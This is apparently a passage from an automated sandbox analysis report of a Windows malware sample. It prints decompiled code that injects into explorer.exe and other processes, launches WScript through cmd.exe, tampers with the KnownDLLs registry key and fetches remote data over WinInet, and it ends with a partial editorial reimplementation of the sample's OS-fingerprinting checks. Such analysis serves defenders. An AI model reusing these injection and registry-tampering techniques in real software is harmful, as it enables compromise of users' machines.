                                                                                                                                            • Part of subcall function 035D8270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,035D3432), ref: 035D8285
                                                                                                                                            • Part of subcall function 035D8270: GetProcAddress.KERNEL32(00000000,?,?,035D3432), ref: 035D828C
                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 035D2CD4
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D2D1A
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D2D82
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AddressFreeProcThread$AllocCodeExitHandleModuleSleepTerminate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 844144628-0
                                                                                                                                          • Opcode ID: f13654a9695a2c416de422819898f0daaeaa92cd66a0d938d1248682550e764c
                                                                                                                                          • Instruction ID: baa4a74ff3ef90507b4aea2a27d1ffa2ed3ff211fdee1123ad9a365e6b5b1a5d
                                                                                                                                          • Opcode Fuzzy Hash: f13654a9695a2c416de422819898f0daaeaa92cd66a0d938d1248682550e764c
                                                                                                                                          • Instruction Fuzzy Hash: 15C15A71A00209EFEB20DF99EC45BEEBBB9FF44300F144469E905E7260D775AA45DBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7ED0: GetFileAttributesW.KERNEL32(?,?,035D31D3,035D47C4,035D47C4,\System32\wuapp.exe,035D47C4,?,00000000), ref: 035D7ED6
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 035D38CD
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 035D3900
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D3942
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D3986
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$FileFree$AllocAttributesSize
                                                                                                                                          • String ID: 0125789244697858$@
                                                                                                                                          • API String ID: 1658238082-3353267005
                                                                                                                                          • Opcode ID: 86ca85a0104d6b8600516fcb58f7db91ad2b496c02b75559cf1231df78549256
                                                                                                                                          • Instruction ID: 5d2a88e3fef1670e17d96e80727be3cba25a02fe96d4c239b2bb9b801365dd4d
                                                                                                                                          • Opcode Fuzzy Hash: 86ca85a0104d6b8600516fcb58f7db91ad2b496c02b75559cf1231df78549256
                                                                                                                                          • Instruction Fuzzy Hash: 19415975E41218EAFB20DF94EC09FDEBBB8BB04705F104155FA05B92D0E7B55A088BA5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                          			E035D8450(char* __ecx, void* __eflags) {
                                                                                                                                          				char _v8;
                                                                                                                                          				char _v1032;
                                                                                                                                          				char _v1036;
                                                                                                                                          				long _v1040;
                                                                                                                                          				char _v5136;
                                                                                                                                          				void* __ebx;
                                                                                                                                          				void* __edi;
                                                                                                                                          				void* __esi;
                                                                                                                                          				void* _t24;
                                                                                                                                          				void* _t34;
                                                                                                                                          				void* _t35;
                                                                                                                                          				intOrPtr _t39;
                                                                                                                                          				signed int _t41;
                                                                                                                                          				void* _t43;
                                                                                                                                          				void* _t44;
                                                                                                                                          				void* _t46;
                                                                                                                                          				void* _t47;
                                                                                                                                          
                                                                                                                                          				_t37 = __ecx;
                                                                                                                                          				E035D1BB0( &_v5136, 0, 0x1000);
                                                                                                                                          				E035D1BB0( &_v1036, 0, 0x404);
                                                                                                                                          				E035D1670( &_v1036, 0, 0x404);
                                                                                                                                          				_v1036 = GetCurrentProcessId();
                                                                                                                                          				E035D1A00( &_v1032, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
                                                                                                                                          				_t46 = _t44 + 0x2c;
                                                                                                                                          				_push(_t35);
                                                                                                                                          				_push(_t41);
                                                                                                                                          				_push(_t39);
                                                                                                                                          				L1:
                                                                                                                                          				while(1) {
                                                                                                                                          					if( *0x37a1314 == 0) {
                                                                                                                                          						_t24 = E035D7EF0("explorer.exe");
                                                                                                                                          						_t47 = _t46 + 4;
                                                                                                                                          						if(_t24 != 0) {
                                                                                                                                          							_t37 =  &_v1036;
                                                                                                                                          							E035D29E0( &_v1036, 0x35d0000, _t24,  &_v1036, 0x404,  &_v8, E035D8390);
                                                                                                                                          							_t46 = _t47 + 0x18;
                                                                                                                                          							goto L12;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						_v1040 = 0;
                                                                                                                                          						_t35 = E035D80E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000);
                                                                                                                                          						_t46 = _t46 + 0xc;
                                                                                                                                          						if(_t35 != 0) {
                                                                                                                                          							_t41 = 0;
                                                                                                                                          							if(_t35 != 0) {
                                                                                                                                          								while( *0x37a2118 == 0) {
                                                                                                                                          									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
                                                                                                                                          									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
                                                                                                                                          										L8:
                                                                                                                                          										_t41 = _t41 + 1;
                                                                                                                                          										if(_t41 < _t35) {
                                                                                                                                          											continue;
                                                                                                                                          										} else {
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										_t34 = E035D29E0(_t37, 0x35d0000, _t39,  &_v1036, 0x404,  &_v8, E035D8390);
                                                                                                                                          										_t46 = _t46 + 0x18;
                                                                                                                                          										if(_t34 == 0) {
                                                                                                                                          											goto L8;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          									goto L12;
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          							L12:
                                                                                                                                          							if( *0x37a2118 != 0) {
                                                                                                                                          								ExitThread(0);
                                                                                                                                          							}
                                                                                                                                          							Sleep(0x1f4);
                                                                                                                                          							continue;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          					return 0;
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          Instruction addresses for E035D8450 (one per decompiled line, in listing order):
                                                                                                                                          0x035d8450 0x035d8467 0x035d847a 0x035d848d 0x035d849b 0x035d84ad 0x035d84b2 0x035d84b5
                                                                                                                                          0x035d84b6 0x035d84b7 0x00000000 0x035d84c0 0x035d84c7 0x035d8552 0x035d8557 0x035d855c
                                                                                                                                          0x035d856c 0x035d8579 0x035d857e 0x00000000 0x035d857e 0x035d84cd 0x035d84d8 0x035d84ea
                                                                                                                                          0x035d84ec 0x035d84f1 0x035d84f7 0x035d84fb 0x035d8501 0x035d850a 0x035d8513 0x035d8546
                                                                                                                                          0x035d8546 0x035d8549 0x00000000 0x00000000
                                                                                                                                          0x035d854b
                                                                                                                                          0x035d851f
                                                                                                                                          0x035d853a
                                                                                                                                          0x035d853f
                                                                                                                                          0x035d8544
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8544
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8513
                                                                                                                                          0x035d8501
                                                                                                                                          0x035d8581
                                                                                                                                          0x035d8588
                                                                                                                                          0x035d859c
                                                                                                                                          0x035d859c
                                                                                                                                          0x035d858f
                                                                                                                                          0x00000000
                                                                                                                                          0x035d858f
                                                                                                                                          0x035d84f1
                                                                                                                                          0x035d85aa
                                                                                                                                          0x035d85aa

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe, xrefs: 035D84A7
                                                                                                                                          • explorer.exe, xrefs: 035D854D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentProcess$ExitSleepThread
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$explorer.exe
                                                                                                                                          • API String ID: 970816010-4081113559
                                                                                                                                          • Opcode ID: 18ffbaae59923a7273dfdad716b3bf4ce92827b1998788d72da6ec98d1bacca4
                                                                                                                                          • Instruction ID: 57ac25266e51a0f52e5ca9af53b04f235ed7acccfb1b03e008e2932e304893de
                                                                                                                                          • Opcode Fuzzy Hash: 18ffbaae59923a7273dfdad716b3bf4ce92827b1998788d72da6ec98d1bacca4
                                                                                                                                          • Instruction Fuzzy Hash: 7C31DDB9940304BAE730FB98FD46FEA737CB744741F4440A4EB09B61A2E770968987B5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E035D6CA0(intOrPtr _a4) {
                                                                                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                                                                                          				struct _STARTUPINFOW _v88;
                                                                                                                                          				short _v1128;
                                                                                                                                          				long _t25;
                                                                                                                                          
                                                                                                                                          				E035D1BB0( &_v88, 0, 0x44);
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				asm("movups [ebp-0x10], xmm0");
                                                                                                                                          				E035D1A00( &_v1128, L"cmd.exe /C WScript \"");
                                                                                                                                          				E035D1970( &_v1128, _a4 - 0xffffff80);
                                                                                                                                          				E035D1970( &_v1128, "\"");
                                                                                                                                          				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                                                          				if(_t25 != 0) {
                                                                                                                                          					CloseHandle(_v20.hThread);
                                                                                                                                          					CloseHandle(_v20);
                                                                                                                                          					ExitThread(_v20.dwProcessId);
                                                                                                                                          				}
                                                                                                                                          				ExitThread(_t25);
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 035D6D15
                                                                                                                                          • ExitThread.KERNEL32 ref: 035D6D20
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 035D6D29
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 035D6D32
                                                                                                                                          • ExitThread.KERNEL32 ref: 035D6D3B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleThread$CreateProcess
                                                                                                                                          • String ID: cmd.exe /C WScript "
                                                                                                                                          • API String ID: 3397019416-3599441821
                                                                                                                                          • Opcode ID: b43eb41dd87dd03174c5aa645aada6cc6f82453f5aabf3833130942dd9d72351
                                                                                                                                          • Instruction ID: 8e585fe0c6222b104ff155d20d2fd647c19de1dc1289d816e7b375749c86ee3a
                                                                                                                                          • Opcode Fuzzy Hash: b43eb41dd87dd03174c5aa645aada6cc6f82453f5aabf3833130942dd9d72351
                                                                                                                                          • Instruction Fuzzy Hash: 9C118BB194030CBADB20EBE4ED49F9E777CBF09700F100150B205E90A5E771A698CB55
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D2DD0(void* __ecx) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				long _t8;
                                                                                                                                          
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f,  &_v8);
                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                          					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E035D1B40(L"ntdll.dll") * 2);
                                                                                                                                          					return RegCloseKey(_v8);
                                                                                                                                          				}
                                                                                                                                          				return _t8;
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,035D2F21), ref: 035D2DF0
                                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 035D2E20
                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 035D2E29
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                          • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                                                          • API String ID: 779948276-834112533
                                                                                                                                          • Opcode ID: 405421778b5508f18edbfefd9d6ea1df1ab5ec568141cf9e0783b4aa379c08a8
                                                                                                                                          • Instruction ID: c0310b9417e8847b9097c88113948bcc8bb4122fcb32774ec40f1f9a8e2a6dcc
                                                                                                                                          • Opcode Fuzzy Hash: 405421778b5508f18edbfefd9d6ea1df1ab5ec568141cf9e0783b4aa379c08a8
                                                                                                                                          • Instruction Fuzzy Hash: 47F08C70681208BAEB30EB94FC06FADB678FF44B00F100060FA05A1072E7A16A24EA41
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E035D4DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                          				char _v1784;
                                                                                                                                          				intOrPtr _v1788;
                                                                                                                                          				char _v1792;
                                                                                                                                          				intOrPtr _v1796;
                                                                                                                                          				char _v2052;
                                                                                                                                          				intOrPtr _v2056;
                                                                                                                                          				char _v2568;
                                                                                                                                          				char _v3080;
                                                                                                                                          				intOrPtr _v3084;
                                                                                                                                          				char _v3148;
                                                                                                                                          				char _v3276;
                                                                                                                                          				intOrPtr _t41;
                                                                                                                                          				intOrPtr _t42;
                                                                                                                                          				intOrPtr _t43;
                                                                                                                                          				void* _t46;
                                                                                                                                          				char _t52;
                                                                                                                                          				char _t62;
                                                                                                                                          				void* _t76;
                                                                                                                                          				short _t79;
                                                                                                                                          				void* _t84;
                                                                                                                                          				intOrPtr _t85;
                                                                                                                                          				void* _t86;
                                                                                                                                          				void* _t87;
                                                                                                                                          				void* _t88;
                                                                                                                                          				void* _t89;
                                                                                                                                          				void* _t92;
                                                                                                                                          				void* _t93;
                                                                                                                                          
                                                                                                                                          				_t93 = __eflags;
                                                                                                                                          				_t80 = __edx;
                                                                                                                                          				_t79 = __ecx;
                                                                                                                                          				E035D1670( &_v3276, 0, 0xcc8);
                                                                                                                                          				_t41 =  *0x37a1bb4; // 0x1e
                                                                                                                                          				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x37a1bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x37a1c24; // 0x0
				_v1788 = _t43;
				_t84 = E035D4B00(_t79, __edx, _t93, _a4);
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E035D28F0(_t84, E035D5000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E035D1510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E035D17E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E035D17E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E035D17E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E035D17E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x37a1c28;
								if( *0x37a1c28 != 0) {
									_t62 = E035D1740("9dbcf183762872d8917b8a19535a0c65",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										E035D76A0(_t79, _t80, _t82, _a16, _a20,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E035D17E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E035D17E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E035D1510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E035D4B00(_t79, _t80, _t94, _t81);
					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E035D17B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E035D4B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E035D4B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}

APIs
• Part of subcall function 035D4B00: InternetCrackUrlA.WININET(74B5EA30,00000000,?,?,00000000,00000000), ref: 035D4B57
• Sleep.KERNEL32(00002710,?,?,74B5EA30,00000000), ref: 035D4E36
• Part of subcall function 035D4B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 035D4B9D
• Part of subcall function 035D4B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 035D4BCB
• Part of subcall function 035D4B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 035D4BE5
• Sleep.KERNEL32(00002710,?,?,?,?,?,?,74B5EA30,00000000), ref: 035D4E78
• Part of subcall function 035D4B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,035DA200,846CF300,00000000), ref: 035D4C52
• Part of subcall function 035D4B00: InternetQueryOptionA.WININET(00000000,0000001F,74B5EA30,00000000), ref: 035D4C8C
• Part of subcall function 035D4B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 035D4CAA
• Part of subcall function 035D4B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 035D4CC1
• Part of subcall function 035D4B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 035D4CF3
• Part of subcall function 035D4B00: InternetCloseHandle.WININET(00000CC8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035D4D9A
• Part of subcall function 035D4B00: InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035D4D9F
Strings
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
• String ID: 9dbcf183762872d8917b8a19535a0c65$FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a
• API String ID: 581717041-2345166521
• Opcode ID: c6ef20c781091d0e8f4d2573b9f62749e7819a009a9b68cd703ecd2a102bf65f
• Instruction ID: aa2df215ad0fcd94df6e313c605b658413c8caa314f892088e21d2e049904934
• Opcode Fuzzy Hash: c6ef20c781091d0e8f4d2573b9f62749e7819a009a9b68cd703ecd2a102bf65f
• Instruction Fuzzy Hash: 9951A6B5D017165BEB71EB6CFC00FEBB7F8BB44241F0805A5D94896260EF349A94CB92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E035D7EF0(intOrPtr _a4) {
    char _v264;
    intOrPtr _v292;
    void* _v300;
    void* _t13;
    void* _t21;
    void* _t29;
    void* _t30;
    void* _t31;

    _v300 = 0x128;
    _t29 = CreateToolhelp32Snapshot(2, 0);
    if(_t29 != 0xffffffff) {
        Process32First(_t29, &_v300);
        _t26 = _a4;
        _t13 = E035D1740(_a4, &_v264);
        _t31 = _t30 + 8;
        if(_t13 == 0) {
            L7:
            CloseHandle(_t29);
            return _v292;
        } else {
            if(Process32Next(_t29, &_v300) == 0) {
                L6:
                CloseHandle(_t29);
                return 0;
            } else {
                while(1) {
                    _t21 = E035D1740(_t26, &_v264);
                    _t31 = _t31 + 8;
                    if(_t21 == 0) {
                        goto L7;
                    }
                    if(Process32Next(_t29, &_v300) != 0) {
                        continue;
                    } else {
                        goto L6;
                    }
                    goto L8;
                }
                goto L7;
            }
        }
    } else {
        return 0;
    }
    L8:
}

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 035D7F08
• Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 035D7F24
• Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 035D7F48
• Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 035D7F6D
• CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 035D7F77
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 2284531361-0
• Opcode ID: e49a2cc6ac1b1c8442e61a5825c7997989f9cd66e90da857fbaf4c4a1ed38573
• Instruction ID: 30e54a2a924d7ade2517fa4861d53f2be2b11ae4ffa165bdcff15a52f694f0b9
• Opcode Fuzzy Hash: e49a2cc6ac1b1c8442e61a5825c7997989f9cd66e90da857fbaf4c4a1ed38573
• Instruction Fuzzy Hash: 9F11E97650112957DB30FA6CFC40EEAB3BCEF49221F0401E1ED58D6090EB30DA9546A1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E035D8CE0() {
    _Unknown_base(*)()* _t2;
    signed int _t3;
    signed int _t5;
    void* _t9;

    *0x37a2e0c = 0x11c;
    _t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
    if(_t2 != 0) {
        *_t2(0x37a2e0c);
    }
    _t3 = *0x37a2e10;
    if(_t3 == 0) {
        L22:
        return _t3;
    } else {
        _t5 = _t3 << 0x00000008 | *0x37a2e14;
        _t9 = _t5 - 0x602;
        if(_t9 > 0) {
            if(_t5 == 0x603) {
                *0x37a2e08 = 4;
                return _t5;
            }
            if(_t5 == 0xa00) {
                _t3 = *0x37a2e18;
                if(_t3 < 0x3fab) {
                    if(_t3 < 0x3ad7) {
                        if(_t3 < 0x3839) {
                            if(_t3 < 0x295a) {
                                goto L22;
                            } else {
                                *0x37a2e08 = 5;
                                return _t3;
                            }
                        } else {
                            *0x37a2e08 = 6;
                            return _t3;
                        }
                    } else {
                        *0x37a2e08 = 7;
                        return _t3;
                    }
                } else {
                    *0x37a2e08 = 8;
                    return _t3;
                }
            } else {
                goto L12;
            }
        } else {
            if(_t9 == 0) {
                *0x37a2e08 = 3;
                return _t5;
            } else {
                if(_t5 == 0x501) {
                    *0x37a2e08 = 1;
                    return _t5;
                } else {
                    if(_t5 != 0x601) {
                        L12:
                        *0x37a2e08 = 0;
                        return _t5;
                    } else {
                        *0x37a2e08 = 2;
                        return _t5;
                    }
                }
            }
        }
    }
}

Instruction addresses 0x035d8cea .. 0x035d8dca (disassembly column not captured in this export)

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,035D8DD5,035D3448), ref: 035D8CF4
                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 035D8CFB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                          • API String ID: 1646373207-1489217083
                                                                                                                                          • Opcode ID: 57923529adb47077672126e4adbe60716b04373cc2e4cf943707deaf71b95daf
                                                                                                                                          • Instruction ID: 5455f5a506330974b4b925b491104bb8b568fc9b4f142706646a704646f38829
                                                                                                                                          • Opcode Fuzzy Hash: 57923529adb47077672126e4adbe60716b04373cc2e4cf943707deaf71b95daf
                                                                                                                                          • Instruction Fuzzy Hash: 17111C76288A409AE734FF18F89C71976A5B398701FEDCC94D001C66EAC3FC81D5CA45
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E035D8270(void* __ecx, intOrPtr _a4) {
                                                                                                                                          				char _v8;
                                                                                                                                          				_Unknown_base(*)()* _t6;
                                                                                                                                          				void* _t8;
                                                                                                                                          
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                          					L3:
                                                                                                                                          					return _v8;
                                                                                                                                          				} else {
                                                                                                                                          					_t8 =  *_t6(_a4,  &_v8);
                                                                                                                                          					if(_t8 != 0) {
                                                                                                                                          						goto L3;
                                                                                                                                          					} else {
                                                                                                                                          						return _t8;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}






Instruction addresses 0x035d827e .. 0x035d82ad (disassembly column not captured in this export)

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,035D3432), ref: 035D8285
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,035D3432), ref: 035D828C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: IsWow64Process$kernel32
                                                                                                                                          • API String ID: 1646373207-3789238822
                                                                                                                                          • Opcode ID: d00e70cd9e3619ea808b24bcd8ca40e7bfb393079f97546f7124e9584722acaf
                                                                                                                                          • Instruction ID: a6b71c650db9f3ef5b213d24b395ecfa6dd0025bfbe20376022481bc76a1f750
                                                                                                                                          • Opcode Fuzzy Hash: d00e70cd9e3619ea808b24bcd8ca40e7bfb393079f97546f7124e9584722acaf
                                                                                                                                          • Instruction Fuzzy Hash: 04E04F71645209AFDB20DBD4FC09E6E77ACEB40245F0401D8BC0892120EB719A119650
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
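Both routines above resolve their targets at run time (GetModuleHandleW followed by GetProcAddress) instead of importing ntdll!RtlGetVersion and kernel32!IsWow64Process, so neither name appears in the import table; the result of the first one is written to the global at 0x37a2e08 and encodes which OS the sample is running on, which is a typical environment-fingerprinting step before the miner payload is staged. The C below is an added editorial example, not code recovered from the sample, reconstructing the same two checks in readable form. Assumptions, since the first function is truncated in this report: _t9 is the resolved RtlGetVersion pointer and _t5 is (major << 8) | minor, which is what the 0x501 / 0x601 comparisons imply; the names classify_os_version, detect_os_class and is_wow64_process are mine. The Windows-only calls are guarded so that the classification logic compiles and runs on any platform.

```c
/* Added example: clean reimplementation of the two fingerprinting routines
 * decompiled above. Not recovered from the sample; all names are editorial. */
#include <stdint.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Values the first routine stores to the global at 0x37a2e08. The meaning of
 * each value is inferred from the 0x501 / 0x601 comparisons in the decompiled tail. */
enum os_class {
    OS_OTHER   = 0,  /* any version other than 5.1 / 6.1 */
    OS_NT51    = 1,  /* 5.1: Windows XP */
    OS_NT61    = 2,  /* 6.1: Windows 7 / Server 2008 R2 */
    OS_UNKNOWN = 3   /* RtlGetVersion could not be resolved (assumption: that is what _t9 == 0 means) */
};

/* Pack major.minor the way the decompiled comparison expects (0x501 == 5.1). */
uint32_t pack_version(uint32_t major, uint32_t minor)
{
    return (major << 8) | (minor & 0xff);
}

/* Branch ladder of the first routine, with the global store replaced by a return value. */
int classify_os_version(int resolved, uint32_t packed)
{
    if (!resolved)       return OS_UNKNOWN;
    if (packed == 0x501) return OS_NT51;
    if (packed == 0x601) return OS_NT61;
    return OS_OTHER;
}

#ifdef _WIN32
typedef LONG (WINAPI *RtlGetVersion_t)(PRTL_OSVERSIONINFOW);
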